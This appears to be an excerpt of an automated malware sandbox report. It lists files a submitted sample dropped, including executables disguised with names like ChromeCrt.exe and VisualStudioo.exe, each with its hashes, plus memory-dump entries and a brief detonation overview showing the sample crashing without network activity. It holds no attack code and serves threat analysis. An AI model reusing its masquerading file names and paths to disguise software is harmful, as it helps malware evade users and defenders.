SHA256 c1d2643bc959026a9427cbe29be2ee034ad06ff84d56c9c00d8afa7a9ae0c5e3
SHA512 007afaa52783e911c16512cd0fad7e1711d18df9d37d58906d49d9724523bbb0836cf6d53d79d12c4f1186cbc0680747126f8850e07860cc6d8320d45d729235

C:\Users\Public\Music\uuac.bat

MD5 c0c5cf18ed5b12d0cf2e77312e553328
SHA1 9f594d79de6cd8d546a6b2869029ebbd59c4b93f
SHA256 197ad34574917cff1d33ae3789fecb0120797e99e652c9746704846ef4a1cc69
SHA512 508d0692ab6e648b0d6de9c29c2b4bd85edcf1e3046533f83cdb1d4f98be6b830ea3f185ef81037afd19d13156a3d528c15339608337b62842d32af24b11ca78

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\israil2.exe.log

MD5 916851e072fbabc4796d8916c5131092
SHA1 d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA256 7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA512 07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b8dd057b34ef460c75e2cf850597e6af
SHA1 92021d50c99ffc1e1a17a71a074bc8b4b527a129
SHA256 c1d2643bc959026a9427cbe29be2ee034ad06ff84d56c9c00d8afa7a9ae0c5e3
SHA512 007afaa52783e911c16512cd0fad7e1711d18df9d37d58906d49d9724523bbb0836cf6d53d79d12c4f1186cbc0680747126f8850e07860cc6d8320d45d729235

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9abf12be9f3d525dd3c104f6e0470c9e
SHA1 830d672ae6f2220fb45be7e7434857e42d029ad4
SHA256 e2a25fd8d5b6c38910388018575e895db8efe5ea822385e752e347f7f588ad44
SHA512 2b7675ad4e3bc731d9496daf6480d2b40a9be7d5580e558ccef4766f5149cbbe9cf64ea373228f5141ada60371a6c988e7c8ba7eb0b97e67a37086d6c0288040

C:\Users\Admin\AppData\Local\Temp\xx.exe

MD5 d3e4bf5f503e63ca9f51a3c19c842b0d
SHA1 7f6fd78fbec8b65744a0cb8ad8e992ed383f0df4
SHA256 5372854f4e74839bd6fbb780f40180921bbbb648d863534c36b029a44c90b549
SHA512 27c1a8d9959a27d6fbc370dfb677eb9e022417b8a0b8adc103713269a961d6c8eb8782299b745d53ba0b7c4291bf53b3951d5959831df328f2a59effc3fac10f

C:\Users\Admin\AppData\Local\Temp\xx.exe

MD5 d3e4bf5f503e63ca9f51a3c19c842b0d
SHA1 7f6fd78fbec8b65744a0cb8ad8e992ed383f0df4
SHA256 5372854f4e74839bd6fbb780f40180921bbbb648d863534c36b029a44c90b549
SHA512 27c1a8d9959a27d6fbc370dfb677eb9e022417b8a0b8adc103713269a961d6c8eb8782299b745d53ba0b7c4291bf53b3951d5959831df328f2a59effc3fac10f

C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe

MD5 e026996a95122a919a1ee58b66d9d18c
SHA1 ed4db7e91d93155484545bf071026c8333fb4f87
SHA256 b5a7a0c9af69d911753b0afdc3859f9f7509749520a308ba4e1e5b547e2c4c9c
SHA512 6cf718e19b3eea23bf56d2720d8972017c9b65f5f102a9e78c4aad89eed64ba2377a56ab28341716120169d750db0855c207c986eb1893c0e4cb7294dae75871

C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe

MD5 e026996a95122a919a1ee58b66d9d18c
SHA1 ed4db7e91d93155484545bf071026c8333fb4f87
SHA256 b5a7a0c9af69d911753b0afdc3859f9f7509749520a308ba4e1e5b547e2c4c9c
SHA512 6cf718e19b3eea23bf56d2720d8972017c9b65f5f102a9e78c4aad89eed64ba2377a56ab28341716120169d750db0855c207c986eb1893c0e4cb7294dae75871

C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe

MD5 382a46ef7bc798b728ed963d542d61d7
SHA1 4af1e5c9d85716555f95d4f88ec5db4d6205b611
SHA256 f63f83f9ac97bdb155e01b72c8bf38797971ad087d1eb54e6019d10ce901fcc7
SHA512 5063fe51a2b048290a7b92f785b1197df981a95b84e3d04610e7dcf5767318f527598fd62c4b89e4da90b7c47ed1c7544b9862bd292123c79f43db9b4dff57f9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4d7bdae60e0d39c0b005d99bd7c0da84
SHA1 a5e4bb58330b7e88e947dac5c4683cf9d80ea6f5
SHA256 01905badf35db9c907e5cfa9fd125345e91b594b0388a227c36e828ed601a8a7
SHA512 cf557df93d67369762551b27d6a3d73d351b5739ae7d969b9d935f1535ffe44971353add97c45adca0a9a37b4f86717eb0910f6af8ba761920fd0d6aacd21cb3

C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe

MD5 382a46ef7bc798b728ed963d542d61d7
SHA1 4af1e5c9d85716555f95d4f88ec5db4d6205b611
SHA256 f63f83f9ac97bdb155e01b72c8bf38797971ad087d1eb54e6019d10ce901fcc7
SHA512 5063fe51a2b048290a7b92f785b1197df981a95b84e3d04610e7dcf5767318f527598fd62c4b89e4da90b7c47ed1c7544b9862bd292123c79f43db9b4dff57f9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe

MD5 2a9c1b05b7c875f6c0f2c43e7abcc381
SHA1 623f806907f075368e454ba79f1812007a749c47
SHA256 1a16f37765daa60e33fce4570fcc20698d63c058a646956e2e31ddb42f8616e5
SHA512 479218de83e5dbbd8e17762dc2cb307e80c0f82d87ea3a9778a8da3936c727529d4238fab8e1ec301a2ce2afb70d3c90e3d3f117cd48fa165254b2feb658a808

C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe

MD5 2a9c1b05b7c875f6c0f2c43e7abcc381
SHA1 623f806907f075368e454ba79f1812007a749c47
SHA256 1a16f37765daa60e33fce4570fcc20698d63c058a646956e2e31ddb42f8616e5
SHA512 479218de83e5dbbd8e17762dc2cb307e80c0f82d87ea3a9778a8da3936c727529d4238fab8e1ec301a2ce2afb70d3c90e3d3f117cd48fa165254b2feb658a808

C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe

MD5 1d19f212f80a82428d6d5aef7b4b784b
SHA1 a58811a2f24fb402058c3987548f4b80fde787f0
SHA256 2756eab9d223ada7198458274fb820630d61f4de1c34ab2db9c743bdbc8c4ebd
SHA512 13673c5cc6c52dc57d5982cf1280ad2f03208586cca40f89f170b55b04b1654069c948a07276d7093ee6899daf41429400c152789ecb1c45265006aa221c8015

C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe

MD5 1d19f212f80a82428d6d5aef7b4b784b
SHA1 a58811a2f24fb402058c3987548f4b80fde787f0
SHA256 2756eab9d223ada7198458274fb820630d61f4de1c34ab2db9c743bdbc8c4ebd
SHA512 13673c5cc6c52dc57d5982cf1280ad2f03208586cca40f89f170b55b04b1654069c948a07276d7093ee6899daf41429400c152789ecb1c45265006aa221c8015

C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe

MD5 4743f7ac802d1cda9c8b55556a4996a5
SHA1 aeef2809aaed922c4c447d50a9eccae9001abb75
SHA256 dd9c74f4bd271caf2c8849bb233ccdffb7b7de3c97394aec58714b86286ee749
SHA512 dbc47c08e4b6ca54e7926fa824989308844e4f116f30e84b46fd7ac88e74e82dc4c079a06193042fcd2466f90054d52d49e1e187a8c6c7d6871fbd2bdc32ed14

C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe

MD5 4743f7ac802d1cda9c8b55556a4996a5
SHA1 aeef2809aaed922c4c447d50a9eccae9001abb75
SHA256 dd9c74f4bd271caf2c8849bb233ccdffb7b7de3c97394aec58714b86286ee749
SHA512 dbc47c08e4b6ca54e7926fa824989308844e4f116f30e84b46fd7ac88e74e82dc4c079a06193042fcd2466f90054d52d49e1e187a8c6c7d6871fbd2bdc32ed14

C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe

MD5 4a6cbc09917c9cd3f0ffa5d702cb82f7
SHA1 bf4dbc4e763c9de0d99264537f307b602d66fedf
SHA256 e919167dfba17e22e02304ada47074e340ea51bd2ae08378f0cdf99468c0bfa1
SHA512 67a8e9eb8312732a57ccbbfc7db17af7ff7703ac7bcdcb72fa71f3ad26cc78edea8f7af475332398e2c44f837480888fde04f8f2004910fd9751e75485fd9266

C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe

MD5 4a6cbc09917c9cd3f0ffa5d702cb82f7
SHA1 bf4dbc4e763c9de0d99264537f307b602d66fedf
SHA256 e919167dfba17e22e02304ada47074e340ea51bd2ae08378f0cdf99468c0bfa1
SHA512 67a8e9eb8312732a57ccbbfc7db17af7ff7703ac7bcdcb72fa71f3ad26cc78edea8f7af475332398e2c44f837480888fde04f8f2004910fd9751e75485fd9266

C:\Users\Admin\AppData\Local\Temp\6DLQBnKtiL.exe

MD5 6305d26e0d0da07bf2863c814880fd90
SHA1 188e757b24db85262538bdc5ad27dc95ee6c79d6
SHA256 a643f81d20450ab0676df158f88f4a7fad7c2bfbedcf9cddfed850b2c5867677
SHA512 e8c9dd5aec0f30f80f978837b9336142e82b5dbbf1b393e3bd982967e80eebc27211f28d0ec18baafa733191828b3622c64246529b7c23c89edf9f0b8a4ff973

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\n4vdGlPOcH.exe.log

MD5 28d7fcc2b910da5e67ebb99451a5f598
SHA1 a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA256 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA512 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

MD5 112177b6405c9b96a95b4747ba9d4dbe
SHA1 724de53c31774aaba7a319f92d2c76399252a729
SHA256 0d27074ebd981b248cea7067ad1429b4ea88b39d7ec0658484b05dfb031bdbe4
SHA512 dd77f41e1d2a9dffc28fb14fdf75dbc8cf470f2ddaddd56944380b72bfeb76ac02581797069076d24d84e41f1328dc4d3de67070b7c3b0564f17721ed0d4ac26

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

MD5 112177b6405c9b96a95b4747ba9d4dbe
SHA1 724de53c31774aaba7a319f92d2c76399252a729
SHA256 0d27074ebd981b248cea7067ad1429b4ea88b39d7ec0658484b05dfb031bdbe4
SHA512 dd77f41e1d2a9dffc28fb14fdf75dbc8cf470f2ddaddd56944380b72bfeb76ac02581797069076d24d84e41f1328dc4d3de67070b7c3b0564f17721ed0d4ac26

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

MD5 112177b6405c9b96a95b4747ba9d4dbe
SHA1 724de53c31774aaba7a319f92d2c76399252a729
SHA256 0d27074ebd981b248cea7067ad1429b4ea88b39d7ec0658484b05dfb031bdbe4
SHA512 dd77f41e1d2a9dffc28fb14fdf75dbc8cf470f2ddaddd56944380b72bfeb76ac02581797069076d24d84e41f1328dc4d3de67070b7c3b0564f17721ed0d4ac26

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 687ff3bb8a8b15736d686119a681097c
SHA1 18f43aa14e56d4fb158a8804f79fc3c604903991
SHA256 51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2
SHA512 047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 687ff3bb8a8b15736d686119a681097c
SHA1 18f43aa14e56d4fb158a8804f79fc3c604903991
SHA256 51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2
SHA512 047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 687ff3bb8a8b15736d686119a681097c
SHA1 18f43aa14e56d4fb158a8804f79fc3c604903991
SHA256 51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2
SHA512 047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

C:\Users\Admin\AppData\Roaming\WiDefault.exe

MD5 394764dfa74ce250be386b93940a4439
SHA1 889ff161e9760d4fd66fcb18983ecba1082ae296
SHA256 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a
SHA512 ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

C:\Users\Admin\AppData\Roaming\WiDefault.exe

MD5 394764dfa74ce250be386b93940a4439
SHA1 889ff161e9760d4fd66fcb18983ecba1082ae296
SHA256 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a
SHA512 ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Roaming\WiDefault.exe

MD5 394764dfa74ce250be386b93940a4439
SHA1 889ff161e9760d4fd66fcb18983ecba1082ae296
SHA256 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a
SHA512 ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

memory/2812-442-0x0000000000400000-0x0000000000412000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 687ff3bb8a8b15736d686119a681097c
SHA1 18f43aa14e56d4fb158a8804f79fc3c604903991
SHA256 51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2
SHA512 047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

MD5 b4f4334ebcea2266ca228c895b1250a3
SHA1 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd
SHA256 cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864
SHA512 faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

MD5 b4f4334ebcea2266ca228c895b1250a3
SHA1 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd
SHA256 cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864
SHA512 faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

MD5 b4f4334ebcea2266ca228c895b1250a3
SHA1 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd
SHA256 cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864
SHA512 faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

MD5 7163cd033d1c5f8fc0aad0e215f09747
SHA1 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f
SHA256 af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa
SHA512 a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

MD5 7163cd033d1c5f8fc0aad0e215f09747
SHA1 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f
SHA256 af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa
SHA512 a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

MD5 7163cd033d1c5f8fc0aad0e215f09747
SHA1 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f
SHA256 af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa
SHA512 a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f

memory/448-515-0x0000000000400000-0x0000000000412000-memory.dmp

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

MD5 77878e1d8406d343fdbbfc359b33ff00
SHA1 7f6c6bae65298f8a112c97def45f66e6fb99ada8
SHA256 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9
SHA512 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

MD5 77878e1d8406d343fdbbfc359b33ff00
SHA1 7f6c6bae65298f8a112c97def45f66e6fb99ada8
SHA256 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9
SHA512 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

MD5 77878e1d8406d343fdbbfc359b33ff00
SHA1 7f6c6bae65298f8a112c97def45f66e6fb99ada8
SHA256 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9
SHA512 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56

memory/3312-539-0x0000000000400000-0x0000000000420000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

memory/4712-558-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-559-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-561-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-563-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-565-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-567-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-569-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-571-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-573-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-575-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-577-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-579-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-581-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-583-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-585-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-587-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-589-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-591-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-595-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-607-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-610-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-612-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-614-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-616-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-618-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-620-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-622-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-624-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-626-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-628-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-630-0x0000000006B40000-0x0000000006BD8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 62d0a8f2dde92001b69bb430c8fee54c
SHA1 9bb2225f9ed5cb3c71c9f166f0fb7a42a7c316ec
SHA256 bd5bcb0c12d851d5e41646c4673e9af1daf7b37743e3b32d7b3754e16732f3f1
SHA512 a69090461e797b37877e4237686ddf4fe055da4525436660a874fb868a426299bf01fc3373decc3f51b5ebdd3267dc0d7d303ee4c7d1d8fb72704d3190e20174

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-15 10:44

Reported

2023-11-15 10:46

Platform

win7-20231023-en

Max time kernel

118s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

Signatures

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\resources.exe

Processes

C:\Users\Admin\AppData\Local\Temp\resources.exe

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 816

Network

N/A

Files

memory/2244-0-0x0000000001270000-0x0000000001286000-memory.dmp

memory/2244-1-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/2244-3-0x0000000073F10000-0x00000000745FE000-memory.dmp